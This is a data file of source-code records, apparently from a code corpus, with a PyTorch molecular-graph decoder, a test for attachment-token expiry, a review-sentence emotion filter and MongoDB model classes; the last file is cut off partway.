+{"seq_id": "522943386", "text": "# -*- coding:UTF-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom branch_jtnn.mol_tree import MolTree, MolTreeNode\nfrom util.nnutils import create_var, GRU\nfrom util.chemutils import enum_assemble, enum_can_assemble\nimport pickle\n\nimport os\n\n# TODO: zyj\n# MAX_NB = 15\nMAX_NB = 20\n# ===================\n\nMAX_DECODE_LEN = 100\nMAX_SOFT_DECODE_LEN = 60\n\nclass JTNNDecoder(nn.Module):\n\n def __init__(self, vocab, hidden_size, embedding, use_molatt):\n super(JTNNDecoder, self).__init__()\n self.hidden_size = hidden_size\n self.vocab_size = vocab.size()\n self.vocab = vocab\n self.embedding = embedding\n self.use_molatt = use_molatt\n\n #GRU Weights\n self.W_z = nn.Linear(2 * hidden_size, hidden_size)\n self.U_r = nn.Linear(hidden_size, hidden_size, bias=False)\n self.W_r = nn.Linear(hidden_size, hidden_size)\n self.W_h = nn.Linear(2 * hidden_size, hidden_size)\n\n #Word Prediction Weights (attention matrix no bias)\n self.W_t = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_W_t = nn.Linear(hidden_size, hidden_size, bias=False)\n if use_molatt:\n self.W = nn.Linear(5 * hidden_size, hidden_size)\n self.W_g = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_W_g = nn.Linear(hidden_size, hidden_size, bias=False)\n else:\n self.W = nn.Linear(3 * hidden_size, hidden_size)\n self.W_g = None\n self.history_W_g = None\n\n #Stop Prediction Weights (attention matrix no bias)\n self.U_i = nn.Linear(2 * hidden_size, hidden_size)\n self.U_t = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_U_t = nn.Linear(hidden_size, hidden_size, bias=False)\n if use_molatt:\n self.U = nn.Linear(5 * hidden_size, hidden_size)\n self.U_g = nn.Linear(hidden_size, hidden_size, bias=False)\n self.history_U_g = nn.Linear(hidden_size, hidden_size, bias=False)\n else:\n self.U = nn.Linear(3 * hidden_size, hidden_size)\n self.U_g = None\n self.history_U_g = None\n\n #Output Weights\n self.W_o = nn.Linear(hidden_size, self.vocab_size)\n self.U_o = nn.Linear(hidden_size, 1)\n\n #Loss Functions\n self.pred_loss = nn.CrossEntropyLoss(size_average=False)\n self.stop_loss = nn.BCEWithLogitsLoss(size_average=False)\n\n def attention(self, hiddens, contexts, x_tree_vecs, x_mol_vecs, y_history_tree_vecs, y_history_mol_vecs, mode):\n if mode == 'word':\n V, V_t, history_V_t, V_g, history_V_g, V_o = self.W, self.W_t, self.history_W_t, self.W_g, self.history_W_g, self.W_o\n elif mode == 'stop':\n V, V_t, history_V_t, V_g, history_V_g, V_o = self.U, self.U_t, self.history_U_t, self.U_g, self.history_U_g, self.U_o\n else:\n raise ValueError('attention mode is wrong')\n\n tree_vecs = x_tree_vecs.index_select(0, contexts)\n tree_att = torch.bmm( tree_vecs, V_t(hiddens).unsqueeze(-1) )\n tree_contexts = (F.softmax(tree_att, dim=1) * tree_vecs).sum(dim=1)\n\n history_tree_vecs = y_history_tree_vecs.index_select(0, contexts)\n history_tree_att = torch.bmm(history_tree_vecs, history_V_t(hiddens).unsqueeze(-1))\n history_tree_contexts = (F.softmax(history_tree_att, dim=1) * history_tree_vecs).sum(dim=1)\n\n if self.use_molatt:\n mol_vecs = x_mol_vecs.index_select(0, contexts)\n mol_att = torch.bmm( mol_vecs, V_g(hiddens).unsqueeze(-1) )\n mol_contexts = (F.softmax(mol_att, dim=1) * mol_vecs).sum(dim=1)\n\n history_mol_vecs = y_history_mol_vecs.index_select(0, contexts)\n history_mol_att = torch.bmm(history_mol_vecs, history_V_g(hiddens).unsqueeze(-1))\n history_mol_contexts = (F.softmax(history_mol_att, dim=1) * history_mol_vecs).sum(dim=1)\n\n input_vec = torch.cat([hiddens, tree_contexts, history_tree_contexts, mol_contexts, history_mol_contexts], dim=1)\n else:\n input_vec = torch.cat([hiddens, tree_contexts, history_tree_contexts], dim=1)\n\n output_vec = F.relu( V(input_vec) )\n return V_o(output_vec)\n\n def forward(self, mol_tree_batch, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs):\n pred_hiddens, pred_contexts, pred_targets = [], [], []\n stop_hiddens, stop_contexts, stop_targets = [], [], []\n traces = []\n for mol_tree in mol_tree_batch:\n s = []\n dfs(s, mol_tree.nodes[0], -1)\n traces.append(s)\n for node in mol_tree.nodes:\n node.neighbors = []\n\n #Predict Root\n batch_size = len(mol_tree_batch)\n\n max_iter = max([len(tr) for tr in traces])\n padding = create_var(torch.zeros(self.hidden_size), False)\n h = {}\n\n for t in range(max_iter):\n\n prop_list = []\n batch_list = []\n for i, plist in enumerate(traces):\n if t < len(plist):\n prop_list.append(plist[t])\n batch_list.append(i)\n\n cur_x = []\n cur_h_nei, cur_o_nei = [], []\n\n for node_x, real_y, _ in prop_list:\n #Neighbors for message passing (target not included)\n cur_nei = [h[(node_y.idx, node_x.idx)] for node_y in node_x.neighbors if node_y.idx != real_y.idx]\n pad_len = MAX_NB - len(cur_nei)\n\n # TODO: zyj\n if pad_len < 0:\n cur_nei = cur_nei[:MAX_NB]\n # =========================\n\n cur_h_nei.extend(cur_nei)\n cur_h_nei.extend([padding] * pad_len)\n\n #Neighbors for stop prediction (all neighbors)\n cur_nei = [h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors]\n pad_len = MAX_NB - len(cur_nei)\n\n # TODO: zyj\n if pad_len < 0:\n cur_nei = cur_nei[:MAX_NB]\n # ==========================\n\n cur_o_nei.extend(cur_nei)\n cur_o_nei.extend([padding] * pad_len)\n\n #Current clique embedding\n cur_x.append(node_x.wid)\n\n #Clique embedding\n cur_x = create_var(torch.LongTensor(cur_x))\n cur_x = self.embedding(cur_x)\n\n #Message passing\n cur_h_nei = torch.stack(cur_h_nei, dim=0).view(-1, MAX_NB, self.hidden_size)\n new_h = GRU(cur_x, cur_h_nei, self.W_z, self.W_r, self.U_r, self.W_h)\n\n #Node Aggregate\n cur_o_nei = torch.stack(cur_o_nei, dim=0).view(-1,MAX_NB,self.hidden_size)\n cur_o = cur_o_nei.sum(dim=1)\n\n #Gather targets\n pred_target,pred_list = [],[]\n stop_target = []\n for i,m in enumerate(prop_list):\n node_x,node_y,direction = m\n x,y = node_x.idx,node_y.idx\n h[(x,y)] = new_h[i]\n node_y.neighbors.append(node_x)\n if direction == 1:\n pred_target.append(node_y.wid)\n pred_list.append(i) \n stop_target.append(direction)\n\n #Hidden states for stop prediction\n cur_batch = create_var(torch.LongTensor(batch_list))\n stop_hidden = torch.cat([cur_x,cur_o], dim=1)\n stop_hiddens.append( stop_hidden )\n stop_contexts.append( cur_batch )\n stop_targets.extend( stop_target )\n \n #Hidden states for clique prediction\n if len(pred_list) > 0:\n batch_list = [batch_list[i] for i in pred_list]\n cur_batch = create_var(torch.LongTensor(batch_list))\n pred_contexts.append( cur_batch )\n\n cur_pred = create_var(torch.LongTensor(pred_list))\n pred_hiddens.append( new_h.index_select(0, cur_pred) )\n pred_targets.extend( pred_target )\n\n #Last stop at root\n cur_x,cur_o_nei = [],[]\n for mol_tree in mol_tree_batch:\n node_x = mol_tree.nodes[0]\n cur_x.append(node_x.wid)\n cur_nei = [h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors]\n pad_len = MAX_NB - len(cur_nei)\n cur_o_nei.extend(cur_nei)\n cur_o_nei.extend([padding] * pad_len)\n\n cur_x = create_var(torch.LongTensor(cur_x))\n cur_x = self.embedding(cur_x)\n cur_o_nei = torch.stack(cur_o_nei, dim=0).view(-1,MAX_NB,self.hidden_size)\n cur_o = cur_o_nei.sum(dim=1)\n\n stop_hidden = torch.cat([cur_x,cur_o], dim=1)\n stop_hiddens.append( stop_hidden )\n stop_contexts.append( create_var( torch.LongTensor(list(range(batch_size))) ) )\n stop_targets.extend([0] * len(mol_tree_batch))\n\n #Predict next clique\n pred_contexts = torch.cat(pred_contexts, dim=0)\n pred_hiddens = torch.cat(pred_hiddens, dim=0)\n pred_scores = self.attention(pred_hiddens, pred_contexts, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs, 'word')\n pred_targets = create_var(torch.LongTensor(pred_targets))\n\n pred_loss = self.pred_loss(pred_scores, pred_targets) / len(mol_tree_batch)\n _,preds = torch.max(pred_scores, dim=1)\n pred_acc = torch.eq(preds, pred_targets).float()\n pred_acc = torch.sum(pred_acc) / pred_targets.nelement()\n\n #Predict stop\n stop_contexts = torch.cat(stop_contexts, dim=0)\n stop_hiddens = torch.cat(stop_hiddens, dim=0)\n stop_hiddens = F.relu( self.U_i(stop_hiddens) )\n stop_scores = self.attention(stop_hiddens, stop_contexts, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs, 'stop')\n stop_scores = stop_scores.squeeze(-1)\n stop_targets = create_var(torch.Tensor(stop_targets))\n \n stop_loss = self.stop_loss(stop_scores, stop_targets) / len(mol_tree_batch)\n stops = torch.ge(stop_scores, 0).float()\n stop_acc = torch.eq(stops, stop_targets).float()\n stop_acc = torch.sum(stop_acc) / stop_targets.nelement()\n\n return pred_loss, stop_loss, pred_acc.item(), stop_acc.item()\n\n def decode(self, x_tree_vecs, x_mol_vecs, reserve_x_tree_vecs, reserve_x_mol_vecs, root_wid,\n extra_neighbor_atom_symbols, extra_neighbor_bonds):\n assert x_tree_vecs.size(0) == 1\n\n stack = []\n zero_pad = create_var(torch.zeros(1,1,self.hidden_size))\n contexts = create_var( torch.LongTensor(1).zero_() )\n\n #Root (The same as the predict center, need not predict)\n root = MolTreeNode(self.vocab.get_smiles(root_wid))\n root.wid = root_wid\n root.idx = 0\n stack.append( (root, self.vocab.get_slots(root.wid)) )\n\n all_nodes = [root]\n h = {}\n for step in range(MAX_DECODE_LEN):\n\n node_x,fa_slot = stack[-1]\n cur_h_nei = [ h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors ]\n if len(cur_h_nei) > 0:\n cur_h_nei = torch.stack(cur_h_nei, dim=0).view(1,-1,self.hidden_size)\n else:\n cur_h_nei = zero_pad\n\n cur_x = create_var(torch.LongTensor([node_x.wid]))\n cur_x = self.embedding(cur_x)\n\n #Predict stop\n cur_h = cur_h_nei.sum(dim=1)\n stop_hiddens = torch.cat([cur_x,cur_h], dim=1)\n stop_hiddens = F.relu( self.U_i(stop_hiddens) )\n stop_score = self.attention(stop_hiddens, contexts, x_tree_vecs, x_mol_vecs,\n reserve_x_tree_vecs, reserve_x_mol_vecs, 'stop')\n \n backtrack = (stop_score.item() < 0) \n\n if not backtrack: #Forward: Predict next clique\n\n new_h = GRU(cur_x, cur_h_nei, self.W_z, self.W_r, self.U_r, self.W_h)\n pred_score = self.attention(new_h, contexts, x_tree_vecs, x_mol_vecs,\n reserve_x_tree_vecs, reserve_x_mol_vecs, 'word')\n\n _,sort_wid = torch.sort(pred_score, dim=1, descending=True)\n sort_wid = sort_wid.data.squeeze()\n\n next_wid = None\n for wid in sort_wid[:5]:\n slots = self.vocab.get_slots(wid)\n node_y = MolTreeNode(self.vocab.get_smiles(wid))\n\n extra_symbols = []\n extra_bonds = []\n if node_x.idx == 0:\n extra_symbols = extra_neighbor_atom_symbols\n extra_bonds = extra_neighbor_bonds\n\n if have_slots(fa_slot, slots) and \\\n can_assemble(node_x, node_y,\n extra_neighbor_atom_symbols=extra_symbols,\n extra_neighbor_bonds=extra_bonds):\n next_wid = wid\n next_slots = slots\n break\n\n if next_wid is None:\n backtrack = True #No more children can be added\n else:\n node_y = MolTreeNode(self.vocab.get_smiles(next_wid))\n node_y.wid = next_wid\n node_y.idx = len(all_nodes)\n node_y.neighbors.append(node_x)\n h[(node_x.idx,node_y.idx)] = new_h[0]\n stack.append( (node_y,next_slots) )\n all_nodes.append(node_y)\n\n if backtrack: #Backtrack, use if instead of else\n\n if len(stack) == 1: \n break #At root, terminate\n\n node_fa,_ = stack[-2]\n cur_h_nei = [ h[(node_y.idx,node_x.idx)] for node_y in node_x.neighbors if node_y.idx != node_fa.idx ]\n if len(cur_h_nei) > 0:\n cur_h_nei = torch.stack(cur_h_nei, dim=0).view(1,-1,self.hidden_size)\n else:\n cur_h_nei = zero_pad\n\n new_h = GRU(cur_x, cur_h_nei, self.W_z, self.W_r, self.U_r, self.W_h)\n h[(node_x.idx,node_fa.idx)] = new_h[0]\n node_fa.neighbors.append(node_x)\n stack.pop()\n\n return root, all_nodes\n \n\"\"\"\nHelper Functions:\n\"\"\"\n\ndef dfs(stack, x, fa_idx):\n for y in x.neighbors:\n if y.idx == fa_idx: continue # 如果是父节点, 则不添加该边\n stack.append( (x,y,1) ) # 1代表正向(根到子)\n dfs(stack, y, x.idx)\n stack.append( (y,x,0) ) # 0代表反向(子到根)\n\ndef sorted_dfs(x_stack, x, fa_idx):\n tot = 0\n all_stacks = []\n for y in x.neighbors:\n if y.idx == fa_idx: continue\n y_stack = [(x,y,1)]\n dfs(y_stack, y, x.idx)\n y_stack.append( (y,x,0) )\n all_stacks.append(y_stack)\n\n all_stacks = sorted(all_stacks, key=lambda x:len(x))\n for stk in all_stacks:\n x_stack.extend(stk)\n\ndef have_slots(fa_slots, ch_slots):\n\n if len(fa_slots) > 2 and len(ch_slots) > 2:\n return True\n matches = []\n for i,s1 in enumerate(fa_slots):\n a1,c1,h1 = s1\n for j,s2 in enumerate(ch_slots):\n a2,c2,h2 = s2\n if a1 == a2 and c1 == c2 and (a1 != \"C\" or h1 + h2 >= 4):\n matches.append( (i,j) )\n\n if len(matches) == 0: return False\n\n fa_match,ch_match = list(zip(*matches))\n if len(set(fa_match)) == 1 and 1 < len(fa_slots) <= 2: #never remove atom from ring\n fa_slots.pop(fa_match[0])\n if len(set(ch_match)) == 1 and 1 < len(ch_slots) <= 2: #never remove atom from ring\n ch_slots.pop(ch_match[0])\n\n return True\n \ndef can_assemble(node_x, node_y, extra_neighbor_atom_symbols=[], extra_neighbor_bonds=[]):\n\n neis = node_x.neighbors + [node_y]\n for i,nei in enumerate(neis):\n nei.nid = i\n\n neighbors = [nei for nei in neis if nei.mol.GetNumAtoms() > 1]\n\n neighbors = sorted(neighbors, key=lambda x:x.mol.GetNumAtoms(), reverse=True)\n singletons = [nei for nei in neis if nei.mol.GetNumAtoms() == 1]\n\n neighbors = singletons + neighbors\n\n cands = enum_can_assemble(node_x, neighbors,\n extra_neighbor_atom_symbols=extra_neighbor_atom_symbols,\n extra_neighbor_bonds=extra_neighbor_bonds)\n\n return len(cands) > 0\n\n\nif __name__ == \"__main__\":\n smiles = [\"O=C1[C@@H]2C=C[C@@H](C=CC2)C1(c1ccccc1)c1ccccc1\", \"O=C([O-])CC[C@@]12CCCC[C@]1(O)OC(=O)CC2\", \"ON=C1C[C@H]2CC3(C[C@@H](C1)c1ccccc12)OCCO3\", \"C[C@H]1CC(=O)[C@H]2[C@@]3(O)C(=O)c4cccc(O)c4[C@@H]4O[C@@]43[C@@H](O)C[C@]2(O)C1\", 'Cc1cc(NC(=O)CSc2nnc3c4ccccc4n(C)c3n2)ccc1Br', 'CC(C)(C)c1ccc(C(=O)N[C@H]2CCN3CCCc4cccc2c43)cc1', \"O=c1c2ccc3c(=O)n(-c4nccs4)c(=O)c4ccc(c(=O)n1-c1nccs1)c2c34\", \"O=C(N1CCc2c(F)ccc(F)c2C1)C1(O)Cc2ccccc2C1\"]\n for s in smiles:\n print(s)\n tree = MolTree(s)\n for i,node in enumerate(tree.nodes):\n node.idx = i\n\n stack = []\n dfs(stack, tree.nodes[0], -1)\n for x,y,d in stack:\n print(x.smiles, y.smiles, d)\n print('------------------------------')\n", "sub_path": "branch_jtnn/jtnn_dec.py", "file_name": "jtnn_dec.py", "file_ext": "py", "file_size_in_byte": 17170, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 98, "usage_type": "name"}, {"api_name": "util.nnutils.create_var", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 116, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 164, "usage_type": "call"}, {"api_name": "util.nnutils.GRU", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 168, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 186, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 194, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 197, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 211, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 211, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 216, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 222, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 223, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 235, "usage_type": "name"}, {"api_name": "util.nnutils.create_var", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.ge", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 243, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 252, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 253, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTreeNode", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 268, "usage_type": "call"}, {"api_name": "util.nnutils.create_var", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 278, "usage_type": "name"}, {"api_name": "util.nnutils.GRU", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.sort", "line_number": 290, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTreeNode", "line_number": 296, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTreeNode", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 331, "usage_type": "call"}, {"api_name": "util.nnutils.GRU", "line_number": 335, "usage_type": "call"}, {"api_name": "util.chemutils.enum_can_assemble", "line_number": 402, "usage_type": "call"}, {"api_name": "branch_jtnn.mol_tree.MolTree", "line_number": 413, "usage_type": "call"}]}
+{"seq_id": "107427428", "text": "from freezegun import freeze_time\nfrom rest_framework import test\nfrom rest_framework.exceptions import ValidationError\n\nfrom waldur_core.core.tests.helpers import override_waldur_core_settings\nfrom waldur_core.media.utils import decode_attachment_token, encode_attachment_token\nfrom waldur_core.structure.tests.factories import CustomerFactory, UserFactory\n\n\n@override_waldur_core_settings(TIME_ZONE='Asia/Muscat')\nclass TestMediaUtils(test.APITransactionTestCase):\n def setUp(self):\n self.user = UserFactory()\n self.customer = CustomerFactory()\n\n def test_token_encoder(self):\n token = encode_attachment_token(self.user.uuid.hex, self.customer, 'image')\n user_uuid, content_type, object_id, field = decode_attachment_token(token)\n self.assertEqual(self.user.uuid.hex, user_uuid)\n self.assertEqual(field, 'image')\n self.assertEqual(object_id, self.customer.uuid.hex)\n\n def test_expired_token(self):\n with freeze_time('2019-01-01'):\n token = encode_attachment_token(self.user.uuid.hex, self.customer, 'image')\n with freeze_time('2019-01-02'):\n self.assertRaises(ValidationError, decode_attachment_token, token)\n", "sub_path": "src/waldur_core/media/tests/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 1205, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "rest_framework.test.APITransactionTestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.test", "line_number": 11, "usage_type": "name"}, {"api_name": "waldur_core.structure.tests.factories.UserFactory", "line_number": 13, "usage_type": "call"}, {"api_name": "waldur_core.structure.tests.factories.CustomerFactory", "line_number": 14, "usage_type": "call"}, {"api_name": "waldur_core.media.utils.encode_attachment_token", "line_number": 17, "usage_type": "call"}, {"api_name": "waldur_core.media.utils.decode_attachment_token", "line_number": 18, "usage_type": "call"}, {"api_name": "freezegun.freeze_time", "line_number": 24, "usage_type": "call"}, {"api_name": "waldur_core.media.utils.encode_attachment_token", "line_number": 25, "usage_type": "call"}, {"api_name": "freezegun.freeze_time", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 27, "usage_type": "argument"}, {"api_name": "waldur_core.media.utils.decode_attachment_token", "line_number": 27, "usage_type": "argument"}, {"api_name": "waldur_core.core.tests.helpers.override_waldur_core_settings", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "35032093", "text": "import os, re\nimport pandas as pd\nfrom config import config\nfrom nltk import sent_tokenize\n\nfilePath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_EMOTION\" + \".csv\"\ndf = pd.read_csv(filePath)\n\ndef selectSentenceWithEmotion(sentences, emotions):\n \"\"\"\n # Arguments\n sentences: string list, each element is a sentence.\n emotions: string list, each element is an emotion word.\n # Returns\n _sentences: string list, each element is a sentence that contains at least one emotion word\n \"\"\"\n emotionsre = re.compile(\"|\".join(emotions))\n _sentences = []\n for sentence in sentences:\n if re.search(emotionsre, sentence):\n _sentences.append(sentence)\n return _sentences\n \nselected = []\nfor _, row in df.iterrows():\n sentences = sent_tokenize(row[\"title_body\"])\n emotions = row[\"extracted\"].split()\n selected.append(\" \".join(selectSentenceWithEmotion(sentences, emotions)))\ndf[\"selected\"] = selected\n\n# Rearrange column order\ndf = df[[\"title_body\", \"extracted\", \"selected\", \"key\"]]\n\n# Write to csv\noutputPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_EMOTION.csv\"\ndf.to_csv(outputPath, encoding='utf-8', index=False)\n\n", "sub_path": "sentidiff.py", "file_name": "sentidiff.py", "file_ext": "py", "file_size_in_byte": 1227, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.sep", "line_number": 6, "usage_type": "attribute"}, {"api_name": "config.config", "line_number": 6, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.search", "line_number": 20, "usage_type": "call"}, {"api_name": "nltk.sent_tokenize", "line_number": 26, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 35, "usage_type": "attribute"}, {"api_name": "config.config", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "280537700", "text": "# _*_ coding:utf-8 _*_\n\n'''\n定义数据模型\n'''\n\nfrom orm.mongodb.mongobase import (BaseModel, Column)\nfrom orm.mongodb.model_types import (STRING, DATETIME)\n\nfrom utils.tools import HornerHashIds\n\nclass UserModel(BaseModel):\n\n __COLLECTION__ = 'user'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, default='', length=32)\n self.company = Column(STRING, null=False)\n self.email = Column(STRING, length=128)\n self.reg_tm = Column(DATETIME)\n self.reg_ip = Column(STRING, null=False)\n self.pwd = Column(STRING, length=32)\n self.phone = Column(STRING)\n\n\nclass HornerCompany(BaseModel):\n '''\n 使用客服系统的企业用户\n '''\n __COLLECTION__ = 'horner_company'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, null=False)\n self.desc = Column(STRING)\n self.reg_tm = Column(DATETIME)\n self.admin = Column(STRING) # 管理员的编号 horner_worker\n\nclass HornerApplication(BaseModel):\n '''\n the app project belows to one company\n '''\n __COLLECTION__ = 'horner_comp_application'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, null=False)\n self.desc = Column(STRING)\n self.reg_tm = Column(DATETIME)\n\nclass HornerServiceSkill(BaseModel):\n '''\n the service skill of one application, corresponding to customer servicer's group\n '''\n __COLLECTION__ = 'horner_service_skill'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, null=False)\n self.skill_id = Column(STRING) # formed by characters in A-Za-z0-9\n self.desc = Column(STRING)\n self.reg_tm = Column(DATETIME)\n\n def __repr__(self):\n return \"<<< HornerServiceSkill >> name: {0}, skill_id: {1}>\".format(self.name, self.skill_id)\n\nclass 